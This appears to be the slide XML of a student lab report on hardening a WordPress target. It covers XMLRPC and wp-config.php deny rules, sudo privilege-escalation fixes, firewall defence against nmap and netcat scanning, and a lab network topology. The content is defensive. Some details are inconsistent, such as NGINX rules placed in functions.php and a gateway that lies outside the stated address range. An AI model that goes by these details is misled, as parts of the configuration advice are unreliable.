              <a:t>Modify the NGINX configuration levels in the WordPress theme’s functions.php file to prevent scanning.</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-546100" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block XMLRPC:</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location ^~ /xmlrpc.php {</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		deny all;</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		error_page 403 =404 / ;</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>							}</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-546100" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stay updated with the latest version of WordPress = 5.7 “esperanza”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Hardening Against V4: Access to “wp-config.php” file</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p5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22" name="Google Shape;422;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314950" y="2387850"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-482600" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not use root user (MySQL-dB) </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Use account with customized privilege</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="40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Restrict file permission only to the owner of wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod 700 wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="40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Use “.htaccess” file to restrict access</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The .htaccess file allows you to set server configurations for a specific directory.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;files wp-config.php&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order allow, deny</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deny from all</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/files&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="40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Hardening Against V5: Privilege Escalation in Sudo</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p5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29" name="Google Shape;429;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314950" y="2387850"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-533400" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enable password for sudo privilege</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configuring “NO PASSWORD” option in sudo privilege is a critical vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upgrade sudo version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( “apt-get” )</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The CVE-2006-0151 vulnerability is in ‘sudo’ version 1.6.8 p9 and below, an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the OS is necessary.</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18883525" y="2427933"/>
            <a:ext cx="4836300" cy="10092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="487575" lIns="487575" spcFirstLastPara="1" rIns="487575" wrap="square" tIns="487575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="725"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2625">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="262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Address Range: 192.168.1.1/20</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Netmask: 255.255.240.0</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Gateway: 10.0.0.1</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625">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="2625">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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IPv4: 192.168.1.90</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OS: Linux</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Hostname: Kali</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IPv4: 192.168.1.110</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OS: Linux</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Hostname: Target 1</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IPv4: 192.168.1.115</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OS: Linux</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Hostname: Target 2</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IPv4: 10.0.0.25 </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OS: Windows</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rPr lang="en-US" sz="2575">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: Azure</a:t>
            </a:r>
            <a:endParaRPr sz="2575">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="725"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2575"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2575"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-33125" y="0"/>
            <a:ext cx="178608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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4"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136" name="Google Shape;136;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1520825" y="2067363"/>
            <a:ext cx="16186350" cy="10814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Hardening Against nmap and netcat on Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;p5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36" name="Google Shape;436;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10658700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-482600" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A firewall can help prevent a nmap scan or shut them down if configured properly. </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="40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WordPress has Firewall Plugins available for easy installation for non-developer users that routes website traffic through a cloud proxy server. </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="40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All traffic should be denied by default. Then, only allowed traffic is added in. Choose the allowed traffic based on the following parameters:</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source IP Address</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
